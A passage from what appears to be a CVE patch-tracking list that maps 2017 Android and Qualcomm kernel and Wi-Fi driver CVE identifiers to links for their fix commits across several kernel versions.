-	Link - qcacld-2.0 - https://source.codeaurora.org/quic/la//platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=29c4ddb447b2d49409a9d0b93631f84a9d2e922e
-	Link - qcacld-3.0 - https://source.codeaurora.org/quic/la//platform/vendor/qcom-opensource/wlan/qcacld-3.0/commit/?id=a2959858f428acfca3ca4c61d3c10b446bfe9b60
-	Link - prima - https://source.codeaurora.org/quic/la//platform/vendor/qcom-opensource/wlan/prima/commit/?id=ddf864f37134df0960d337ff16e6f2435b4fe90c
-CVE-2017-0454
-	Link - 3.10 - https://source.codeaurora.org/quic/la//kernel/msm-3.10/commit/?id=01f3ad23574c85a060e6add7a20173621b5b2c77
-	Link - 3.18 - https://source.codeaurora.org/quic/la//kernel/msm-3.18/commit/?id=484349ebc927b7be6cc9187c6bd71ffb3f4112d1
-	Link - 4.4 - https://source.codeaurora.org/quic/la//kernel/msm-4.4/commit/?id=263bb8242e005803529cb7cd785354de817db88a
-CVE-2017-0455
-	Link - https://source.codeaurora.org/quic/la/kernel/lk/commit/?id=2c00928b4884fdb0b1661bcc530d7e68c9561a2f
-CVE-2017-0456
-	Link - https://www.codeaurora.org/gitweb/quic/la/?p=kernel/msm-3.18.git;a=commit;h=dfb170e243a3082a668f77ec0190af2c2bed9161
-CVE-2017-0457
-	Link - 3.10 - https://source.codeaurora.org/quic/la//kernel/msm-3.10/commit/?id=7d87c5cf051c49c7b3bdb8abe4051b0aef41c87d
-	Link - 3.18 - https://github.com/android/kernel_msm/commit/f6e21d2a3778bcbbef7320ffbf31631d76679175
-CVE-2017-0458
-	Link - https://source.codeaurora.org/quic/la//kernel/msm-3.18/commit/?id=eba46cb98431ba1d7a6bd859f26f6ad03f1bf4d4
-CVE-2017-0459
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?h=rel/msm-3.18&id=ffacf6e2dc41b6063c3564791ed7a2f903e7e3b7
-CVE-2017-0460
-	Link - 3.10 - https://source.codeaurora.org/quic/la//kernel/msm-3.10/commit/?id=93dd37c412dbadff9d5b1b6f7b317713192cab2b
-	Link - 3.18 - https://source.codeaurora.org/quic/la//kernel/msm-3.18/commit/?id=8e2e23126709ebffa1bd91e1a6ac77e16714d852
-	Link - 4.4 - https://source.codeaurora.org/quic/la//kernel/msm-4.4/commit/?id=85cccedb0cae0331228cc58fa91d31810018df98
-CVE-2017-0461
-	Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=ce5d6f84420a2e6ca6aad6b866992970dd313a65
-CVE-2017-0462
-	Link - 3.18 - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=eb7b1426279e751b1fc3e86f434dc349945c1ae7
-	Link - 4.4 - https://www.codeaurora.org/gitweb/quic/la/?p=kernel/msm-4.4.git;a=commit;h=9a71e9a686942ae3c491061ab275a3678ee2819a
-CVE-2017-0463
-	Link - 3.18 - https://source.codeaurora.org/quic/la//kernel/msm-3.18/commit/?id=955bd7e7ac097bdffbadafab90e5378038fefeb2
-	Link - 4.4 - https://www.codeaurora.org/gitweb/quic/la/?p=kernel/msm-4.4.git;a=commit;h=32c229060ca33b816c50eedc136ea2800f9974df
-CVE-2017-0464
-	Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=051597a4fe19fd1292fb7ea2e627d12d1fd2934f
-CVE-2017-0465
-	Link - https://source.codeaurora.org/quic/la//kernel/msm-4.4/commit/?id=3823f0f8d0bbbbd675a42a54691f4051b3c7e544
-CVE-2017-0507
-	Link - https://github.com/aosp-mirror/kernel_msm/commit/03c26a1d8c8687131da151c2e4bd5a04d08e0dec
-CVE-2017-0509
-	Link - https://github.com/android/kernel_msm/commit/9c5e11d70f209553d023ea2b79efe7b2bf85fd5e
-CVE-2017-0510
-	Link - 3.4 - https://review.lineageos.org/#/c/179097
-	Link - 3.10 - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=d4dfd82835bb6f92de3bfb8a1cbf6beaf892ad08
-	Link - 3.18 - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=7a4fd6fb0df85d16db29561e0063b41a62f11e4d
-CVE-2017-0516
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=0dba52cf7955306c71fb76d16437d848c953e462
-CVE-2017-0518
-	Link - 3.18 - https://github.com/android/kernel_msm/commit/015d1d5dc8c42d6ab92a31b99cd9f089fae1d27e
-	Link - 3.18 - https://github.com/android/kernel_msm/commit/a064a44e03158dbf655a866ba21f5d1baa2dee9e
-CVE-2017-0519
-	Link - 3.18 - https://github.com/android/kernel_msm/commit/2f264730e26a73da973c6eef0e1ee252294ec740
-CVE-2017-0520
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=eb2aad752c43f57e88ab9b0c3c5ee7b976ee31dd
-CVE-2017-0521
-	Link - 3.18 - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=dbe4f26f200db10deaf38676b96d8738afcc10c8
-	Link - 4.4 - https://www.codeaurora.org/gitweb/quic/la/?p=kernel/msm-4.4.git;a=commit;h=77c4aba67d89ba4055b7c9bd417f49593cba497b
-CVE-2017-0523
-	Link - 3.18 - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=5bb646471da76d3d5cd02cf3da7a03ce6e3cb582
-	Link - 4.4 - https://www.codeaurora.org/gitweb/quic/la/?p=kernel/msm-4.4.git;a=commit;h=2c7b4349b858398caf0ae146e87554c3502d20a5
-CVE-2017-0524
-	Link - https://github.com/android/kernel_msm/commit/e1fb1600fc222337989e3084d68df929882deae5
-	Link - https://github.com/android/kernel_msm/commit/0ab30d91fb178c5967753343029581983a4e9b67
-	Link - https://github.com/android/kernel_msm/commit/e6430a4da1fb0212a546379eadbe986f629c3ae9
-CVE-2017-0525
-	Link - 3.10 - https://source.codeaurora.org/quic/la//kernel/msm-3.10/commit/?id=58a0d46820909166c89286bdbffbae3358daf778
-	Link - 3.18 - https://source.codeaurora.org/quic/la//kernel/msm-3.18/commit/?id=a6a6e4993aca80b7cddab8752f7d8636eb45a8c5
-	Link - 4.4 - https://source.codeaurora.org/quic/la//kernel/msm-4.4/commit/?id=7452cc75cbd363107a1e5d4c5f1327d3edc797ef
-CVE-2017-0531
-	Link - 3.18 - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=530f3a0fd837ed105eddaf99810bc13d97dc4302
-	Link - 4.4 - https://www.codeaurora.org/gitweb/quic/la/?p=kernel/msm-4.4.git;a=commit;h=d342da7d820af9c7c0b0b8049adb53beb713e0f0
-CVE-2017-0533
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=e3af5e89426f1c8d4e703d415eff5435b925649f
-CVE-2017-0534
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=e3af5e89426f1c8d4e703d415eff5435b925649f
-CVE-2017-0535
-	Link - https://android.googlesource.com/kernel/tegra/+/fb2e6cf549dcbdcc10f9c3115ba5123bdd5a307e
-CVE-2017-0536
-	Link - https://github.com/android/kernel_msm/commit/e6430a4da1fb0212a546379eadbe986f629c3ae9
-CVE-2017-0537
-	Link - https://source.codeaurora.org/quic/la/kernel/tegra/commit/?id=389b185cb2f17fff994dbdf8d4bac003d4b2b6b3
-CVE-2017-0564
-	Link - https://github.com/aosp-mirror/kernel_msm/commit/941a80cf3340804e488c6ee2742e7a771bd01272
-CVE-2017-0568
-	Depends
-	Link - https://github.com/android/kernel_msm/commit/b7fb46c77af4623291f53a5453df733b8fb1fe18
-	Link - https://github.com/android/kernel_msm/commit/a3f3e7ed54aaa4f5f6929f1ed460363fdc8964d6
-CVE-2017-0569
-	Link - 3.10 - https://github.com/android/kernel_msm/commit/b7fb46c77af4623291f53a5453df733b8fb1fe18
-CVE-2017-0570
-	Link - 3.10 - https://github.com/android/kernel_msm/commit/b7fb46c77af4623291f53a5453df733b8fb1fe18
-CVE-2017-0571
-	Link - 3.10 - https://github.com/android/kernel_msm/commit/4b29d0111186ebef75a9af7da8257697386ac4a4
-CVE-2017-0572
-	Link - https://github.com/android/kernel_msm/commit/3afb019c44d750086f8d5228f8c934da2910d8df
-CVE-2017-0573
-	Link - https://github.com/android/kernel_msm/commit/3d9f2799fd13d1125ab4b3d74a523bd7f2e566f3
-CVE-2017-0574
-	Link - https://github.com/android/kernel_msm/commit/e55ddf68568a33288d76f5e00c93f8157cb9a632
-CVE-2017-0575
-	Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=a4f790c140d9813c3af66a9b367b4568e053278a
-CVE-2017-0576
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=2b09507d78b25637df6879cd2ee2031b208b3532
-CVE-2017-0583
-	Link - 3.10 - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=b8f70068650a6e6bef0a41de2e30c17087d3a84d
-	Link - 3.18 - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=452d2ad331d20b19e8a0768c4b6e7fe1b65abe8f
-CVE-2017-0584
-	Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=b83b9057d56c057d1dfca79ae197583a83766245
-CVE-2017-0586
-	Link - https://github.com/android/kernel_msm/commit/05bacdc0f9c16c58326a4be9e88afa870cf1024e
-CVE-2017-0604
-	Link - https://source.codeaurora.org/quic/la//kernel/msm-3.18/commit/?id=6975e2dd5f37de965093ba3a8a08635a77a960f7
-CVE-2017-0606
-	Link - https://www.codeaurora.org/gitweb/quic/la/?p=kernel/msm-4.4.git;a=commit;h=d3237316314c3d6f75a58192971f66e3822cd250
-CVE-2017-0607
-	Link - https://source.codeaurora.org/quic/la//kernel/msm-4.4/commit/?id=b003c8d5407773d3aa28a48c9841e4c124da453d
-CVE-2017-0608
-	Link - 4.4 - https://source.codeaurora.org/quic/la/kernel/msm-4.4/commit/?id=167a094eac4383809dd703d96fb88c406dd8786b
-	Link - 4.4 - https://source.codeaurora.org/quic/la//kernel/msm-4.4/commit/?id=b66f442dd97c781e873e8f7b248e197f86fd2980
-CVE-2017-0609
-	Link - https://source.codeaurora.org/quic/la//kernel/msm-4.4/commit/?id=38a83df036084c00e8c5a4599c8ee7880b4ee567
-CVE-2017-0610
-	Link - https://source.codeaurora.org/quic/la//kernel/msm-4.4/commit/?id=65009746a6e649779f73d665934561ea983892fe
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-4.4/commit/?id=2bf336ed7ff29768b63fcf0d9528dd129f516643
-CVE-2017-0611
-	Link - 3.4 - https://review.lineageos.org/#/c/179797/
-	Link - 3.10 - https://review.lineageos.org/#/c/171424/
-	Link - 4.4 - https://source.codeaurora.org/quic/la//kernel/msm-4.4/commit/?id=1aa5df9246557a98181f03e98530ffd509b954c8
-CVE-2017-0612
-	Link - https://source.codeaurora.org/quic/la//kernel/msm-3.18/commit/?id=05efafc998dc86c3b75af9803ca71255ddd7a8eb
-CVE-2017-0613
-	Link - https://source.codeaurora.org/quic/la//kernel/msm-4.4/commit/?id=b108c651cae9913da1ab163cb4e5f7f2db87b747
-CVE-2017-0614
-	Link - https://source.codeaurora.org/quic/la//kernel/msm-3.18/commit/?id=fc2ae27eb9721a0ce050c2062734fec545cda604
-CVE-2017-0619
-	Link - https://source.codeaurora.org/quic/la//kernel/msm-3.14/commit/?id=72f67b29a9c5e6e8d3c34751600c749c5f5e13e1
-CVE-2017-0620
-	Link - https://source.codeaurora.org/quic/la//kernel/msm-4.4/commit/?id=01b2c9a5d728ff6f2f1f28a5d4e927aaeabf56ed
-CVE-2017-0621
-	Link - https://source.codeaurora.org/quic/la//kernel/msm-3.10/commit/?id=9656e2c2b3523af20502bf1e933e35a397f5e82f
-CVE-2017-0622
-	Link - 3.18 - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=40efa25345003a96db34effbd23ed39530b3ac10
-	Link - 4.4 - https://www.codeaurora.org/gitweb/quic/la/?p=kernel/msm-4.4.git;a=commit;h=2881d2bbc26ff321fd9e717ad6f968aebd277d22
-CVE-2017-0624
-	Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=0ac5f6f2f221efb93fc0ddb1fec6487c76d95acd
-CVE-2017-0626
-	Link - https://source.codeaurora.org/quic/la//kernel/msm-4.4/commit/?id=64551bccab9b5b933757f6256b58f9ca0544f004
-CVE-2017-0627
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=fcca203d8e6aa0ef22fa41d72a06dea393d6d148
-CVE-2017-0628
-	Link - https://source.codeaurora.org/quic/la//kernel/msm-4.4/commit/?id=012e37bf91490c5b59ba2ab68a4d214b632b613f
-CVE-2017-0629
-	Link - https://source.codeaurora.org/quic/la//kernel/msm-4.4/commit/?id=012e37bf91490c5b59ba2ab68a4d214b632b613f
-CVE-2017-0630
-	Link - 3.10 - https://github.com/aosp-mirror/kernel_msm/commit/28fb06421ab3d9256d32611138306470996cc4c1
-	Link - 3.10 - https://github.com/aosp-mirror/kernel_msm/commit/45e5a5e1b85f23843b90f3cddcfc26fa862ff80c
-CVE-2017-0631
-	Link - https://source.codeaurora.org/quic/la//kernel/msm-4.4/commit/?id=8236d6ebc7e26361ca7078cbeba01509f10941d8
-CVE-2017-0632
-	Link - https://source.codeaurora.org/quic/la//kernel/msm-3.10/commit/?id=970d6933e53c1f7ca8c8b67f49147b18505c3b8f
-CVE-2017-0633
-	Link - https://github.com/android/kernel_msm/commit/4e38c573e81eb76f09bae425f035be392fbab370
-CVE-2017-0648
-	Link - https://android.googlesource.com/kernel/tegra/+/34597d088801ad8060b45026df2435f52136032f
-CVE-2017-0650
-	Link - https://github.com/android/kernel_msm/commit/c6d874fd2c515406bc33ab78d60df70a47bddae2
-CVE-2017-0651
-	Link - https://android.googlesource.com/kernel/tegra/+/c555ed3d0a8133c30731f25263b44d878844e277
-CVE-2017-0705
-	Link - https://github.com/android/kernel_msm/commit/e58dd312d3d28331b2e28674c6a49f815a55d4bc
-CVE-2017-0706
-	Link - https://android.googlesource.com/kernel/msm/+/6a469209ac014b6d93f373e042500f6e8cd6a04a
-CVE-2017-0710
-	Link - https://android.googlesource.com/kernel/msm/+/f37e859ab4c55c6c56e3c157bbed3024fc8d0dc6
-CVE-2017-0740
-	Link - https://github.com/android/kernel_msm/commit/e7fdc1ca00f1e589df8542af7e7acaaa87370625
-CVE-2017-0744
-	Link - https://android.googlesource.com/kernel/tegra/+/8054a1fe453e8114bbb56c424e1ea80639bb6b54
-CVE-2017-0746
-	Link - https://github.com/android/kernel_msm/commit/a793531b751d8c3609e2bf1a5dc2c0f10e003632
-CVE-2017-0747
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=c0021edb9ee6b2a37322cd6cf6ebdf160d09b8d7
-CVE-2017-0748
-	Link - https://github.com/android/kernel_msm/commit/43ff88a8336310e665941dea6ffec77cc8314706
-CVE-2017-0749
-	Link - https://android.googlesource.com/kernel/mediatek/+/7116d306da66de0de21e982024b4d3a3056f4461
-CVE-2017-0750
-	Link - https://github.com/android/kernel_msm/commit/3f0531e5775303091a1ff975cdd572cc6a935321
-CVE-2017-0751
-	Link - https://github.com/android/kernel_msm/commit/ee4aa31b9f24c28064e509e22c1f9013df768f5f
-CVE-2017-0786
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=68acc6ab1474e9dde68880a7856e8a74ff86aa19
-CVE-2017-0787
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=08ccf853c567bf02f4a5c9f9aef19a40ecdf57d1
-CVE-2017-0788
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=08ccf853c567bf02f4a5c9f9aef19a40ecdf57d1
-CVE-2017-0789
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=58168423faa39f5062047eb1d16d294902f0f48b
-CVE-2017-0790
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=5575ff40a53a954ec942ff0c17b193433e72c132
-CVE-2017-0791
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=2935fde98001eca0f8dafad827933ce60d44ffba
-CVE-2017-0792
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=f35ce58f516c15c022745d687bb1c59ffab63293
-CVE-2017-0794
-	Link - https://github.com/aosp-mirror/kernel_msm/commit/47b3a105cc4cec0d912345d27d9743b97691b21c
-CVE-2017-0824
-	Link - https://source.codeaurora.org/quic/la/kernel/tegra/commit/?id=3d6c7b39db34369e28b0581be26f57e9467f8408
-CVE-2017-0825
-	Link - https://github.com/android/kernel_msm/commit/83366dd9ddb9337450f704ceef750a06c69df9ff
-CVE-2017-0861
-	Link - 3.10 - https://github.com/aosp-mirror/kernel_msm/commit/93533f313a1bf465ff8c33032e91b88315dcf9bf
-CVE-2017-0862
-	Link - 3.10 - https://github.com/aosp-mirror/kernel_msm/commit/19384322b5b51987bd6037f7a6b18a62a5d4d654
-CVE-2017-0866
-	Link - 3.18 - https://android.googlesource.com/kernel/tegra/+/40286163f84a29993c2f552a237256541875a1b4
-CVE-2017-1000251
-	Link - 3.0 - https://review.lineageos.org/#/c/189602/
-	Link - 3.4 - https://review.lineageos.org/#/c/189415/
-	Link - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=e860d2c904d1a9f38a24eb44c9f34b8f915a6ea3
-CVE-2017-1000364
-	Depends
-	Link - 3.2 - https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?id=640c7dfdc7c723143b1ce42f5569ec8565cbbde7
-	Link - 3.2 - https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?id=a7d519473a32267e52f1f92141240451e5403dd3
-	Link - 3.4 - https://review.lineageos.org/#/c/179545/
-	Link - 3.4 - https://review.lineageos.org/#/c/179546/
-	Link - 3.10 - https://review.lineageos.org/#/c/178806/
-	Link - 3.10 - https://review.lineageos.org/#/c/178807/
-	Link - 3.10 - https://review.lineageos.org/#/c/178808/
-	Link - 3.18 - https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?h=v3.18.59&id=d4712eb79b17d85c9e354efa2d3156ce50736128
-	Link - 3.18 - https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit?h=linux-3.18.y&id=c6aeba66df8743478d7b9f64fa76d88ed4100c67
-	Link - 3.18 - https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit?h=linux-3.18.y&id=509f8f1772ec2972898771ecc376572b6efd184a
-CVE-2017-1000365
-	Link - 3.10 - https://review.lineageos.org/#/c/179178/1
-	Link - 3.18 - https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?h=v3.18.59&id=2dff2164d171e9c27f2f7fa778d408ecf4d1e1ea
-CVE-2017-1000380
-	Link - ^4.11 - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=ba3021b2c79b2fa9114f92790a99deb27a65b728
-	Link - ^4.11 - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=d11662f4f798b50d8c8743f433842c3e40fe3378
-CVE-2017-10661
-	Link - https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?id=1e38da300e1e395a15048b0af1e5305bd91402f6
-CVE-2017-10662
-	Link - https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?id=b9dd46188edc2f0d1f37328637860bb65a771124
-CVE-2017-10663
-	Link - 3.10 - https://github.com/aosp-mirror/kernel_msm/commit/2b97ce290c589827e21838c70c9c5601b663037a
-	Link - 3.18 - https://git.kernel.org/pub/scm/linux/kernel/git/jaegeuk/f2fs-stable.git/commit/?h=linux-3.18.y&id=deaeed5b8acdd10c388616bbc57416cf3db213ff
-CVE-2017-10996
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=9f261e5dfe101bbe35043822a89bffa78e080b3b
-CVE-2017-10997
-	Link - 3.10 - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=fae242db5e1943ba878b4fb215fe6e7f1c387a20
-	Link - 4.4 - https://source.codeaurora.org/quic/la/kernel/msm-4.4/commit/?id=a395a070880acc679e3832b21d96504edbbe4af2
-CVE-2017-10998
-	Link - 3.10 - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=9ffb3cdd7279b011a509267caa4a5119fd6346c0
-	Link - 3.18 - https://source.codeaurora.org/quic/la//kernel/msm-3.18/commit/?id=208e72e59c8411e75d4118b48648a5b7d42b1682
-CVE-2017-10999
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=f51a152ad52108457ae6b1caf7a04857f25c4bed
-CVE-2017-11000
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=af787fdedeb62964efaf9e969ad17e3b6c232082
-CVE-2017-11001
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=d5d2c9baff89932e822ceae74b1569af07d55f19
-CVE-2017-11002
-	Link - prima - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/prima/commit/?id=64c0865bb0c5a642ba420967b23e0f66e035b300
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=825eeb85d4866e362452b18df929a54a7c6111f6
-CVE-2017-11012
-	Link - qcacld-3.0 - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-3.0/commit/?id=7d0e40d328fa092c36b9585516ed29fc6041be55
-CVE-2017-11013
-	Link - prima - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/prima/commit/?id=64297e4caffdf6b1a90807bbdb65a66b43582228
-	Link - qcacld-2.0 - https://android.googlesource.com/kernel/msm/+/bb3c16f2e001eef9dcdd73e8c6ed6331e5fdd86b
-	Link - qcacld-3.0 - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-3.0/commit/?id=c9f8654b11a1e693022ad7f163b3bc477fea8ce8
-CVE-2017-11014
-	Link - qcacld-2.0 - https://github.com/aosp-mirror/kernel_msm/commit/adb96af5b080dfe4ee29961a17ed3f04c87d5519
-	Link - qcacld-3.0 - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-3.0/commit/?id=ec58bc99e29d89f8e164954999ef8a45cec21754
-CVE-2017-11015
-	Link - prima - https://github.com/LineageOS/lge-kernel-mako/commit/ac39bfffe109a6cffcaf3b537505130712161dce
-	Link - prima - https://github.com/LineageOS/lge-kernel-mako/commit/d0cd3ede7c17ee7fcf0f9b6d125d027bc28640be
-	Link - qcacld-2.0 - https://github.com/aosp-mirror/kernel_msm/commit/d7285900f6fa28b0be51f5d18c52bd06385f8aee
-	Link - qcacld-2.0 - https://github.com/aosp-mirror/kernel_msm/commit/a50ca3ce494ab6bb6b2e37cdd0428aa6d6260bef
-	Link - qcacld-3.0 - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-3.0/commit/?id=ec58bc99e29d89f8e164954999ef8a45cec21754
-	Link - qcacld-3.0 - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-3.0/commit/?id=1ef6add65a36de6c4da788f776de2b5b5c528d8e
-CVE-2017-11018
-	Link - https://source.codeaurora.org/quic/la/kernel/msm/commit/?id=1d718286c4c482502a2c4356cebef28aef2fb01f
-CVE-2017-11022
-	Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=1379bfb6c09ee2ad5969db45c27fb675602b4ed0
-	Link - qcacld-3.0 - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-3.0/commit/?id=f41e3dbc92d448d3d56cae5517e41a4bafafdf3f
-CVE-2017-11023
-	Link - 3.18 - https://github.com/aosp-mirror/kernel_msm/commit/17ef83c708be034454df7914ef5484c36515eece
-	Link - 4.4 - https://source.codeaurora.org/quic/la/kernel/msm-4.4/commit/?id=c36e61af0f770125d0061a8d988d0987cc8d116a
-CVE-2017-11024
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=f2a482422fefadfa0fa9b4146fc0e2b46ac04922
-CVE-2017-11025
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=95e72ae9281b77abc3ed0cc6a33c17b989241efa
-CVE-2017-11028
-	Depends
-	Link - 3.18 - https://github.com/aosp-mirror/kernel_msm/commit/a96e06fac09e182b5211f20dd6311f93a5d056af
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-4.4/commit/?id=fd70b655d901e626403f132b65fc03d993f0a09b
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-4.4/commit/?id=6724296d3f3b2821b83219768c1b9e971e380a9f
-CVE-2017-11029
-	Link - 3.10 - https://github.com/aosp-mirror/kernel_msm/commit/e13a16c079cf8f5c758f5c31fbd72edca2656e54
-	Link - 3.18 - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=74ab23917b82769644a3299da47b58e080aa63f2
-	Link - 4.4 - https://source.codeaurora.org/quic/la/kernel/msm-4.4/commit/?id=86f0d207d478e1681f6711b46766cfb3c6a30fb5
-CVE-2017-11032
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=2720294757d0ad5294283c15dc837852f7b2329a
-CVE-2017-11035
-	Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=cc1896424ae7a346090f601bc69c6ca51d9c3e04
-	Link - qcacld-3.0 - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-3.0/commit/?id=c5060da3e741577578d66dfadb7922d853da6156
-CVE-2017-11040
-	Link - https://source.codeaurora.org/quic/la/kernel/msm-4.4/commit/?id=7a4d0eea0ca0c8a72111ae58d9829be817f102c9
-CVE-2017-11046
-	Link - https://github.com/android/kernel_msm/commit/5ff192e2c758298680b0c6cd364a55c59850901f
-CVE-2017-11048
-	Link - https://github.com/android/kernel_msm/commit/a42f6e19316e9e5aaaf8bd2c3bec25fde136dcaa
-CVE-2017-11050
-	Link - qcacld-2.0 - https://source.codeaurora.org/quic/la//platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=725674586f5bc009ef5175d29eb0fd677e0ef1f2
-CVE-2017-11051
-	Link - qcacld-2.0 - https://source.codeaurora.org/quic/la//platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=c8f263f0e3b0b6cba38fae9b2330d77f802c51d8
-CVE-2017-11052
-	Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=c1ea8487f35d3f4dea574552afda6a1637f98bbb
-CVE-2017-11053
-	Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=99c00329bc13c526305dc826950c2cc117e6725d
-CVE-2017-11054
-	Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=4d9812973e8b12700afd8c3d6f36a94506ffb6fc
-CVE-2017-11055
-	Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=708633ca627031373f5cc3ca2e8994e7d694905a
-CVE-2017-11056
-	Link - https://github.com/android/kernel_msm/commit/d5481967f73c5448b9b2ae528a75faa0b040bc42
-CVE-2017-11057
-	Link - https://github.com/android/kernel_msm/commit/270bb9351889878dbfc87a6797886cb3caf42430
-CVE-2017-11058
-	Link - qcacld-2.0 - https://source.codeaurora.org/quic/la//platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=4d9812973e8b12700afd8c3d6f36a94506ffb6fc
-CVE-2017-11059
-	Link - https://github.com/android/kernel_msm/commit/be632ce97422dfe533944186e2f4420b87b87ad5
-CVE-2017-11060
-	Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=657bb41463b837b2681e1fed310bd97970b09b83
-CVE-2017-11061
-	Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=e08628a3cfe039bc4bdd7fc66f5ec7a59a97b404
-CVE-2017-11062
-	Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=954bdf216ce56a860092fd9549229b036e08c97b
-CVE-2017-11064
-	Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=38d6f16b8583bae6a1881c744ae08d609c99cb7e
-CVE-2017-11067
-	Link - https://github.com/aosp-mirror/kernel_msm/commit/3fabdcba3a09ce8f3cc757bf6240e53421a1e363
-CVE-2017-11073
-	Link - 3.10 - https://github.com/aosp-mirror/kernel_msm/commit/120d28bad9890eca3a6451a83a7c71cb650dfef7
-CVE-2017-11085
-	Link - 3.10 - https://github.com/aosp-mirror/kernel_msm/commit/dc8f7a19762df2c84678482b60f6b807b919eb44
-CVE-2017-11089
-	Link - https://android.googlesource.com/kernel/msm/+/a30bdf229ab1efd96e500c43aabbff20e223128a
-CVE-2017-11090
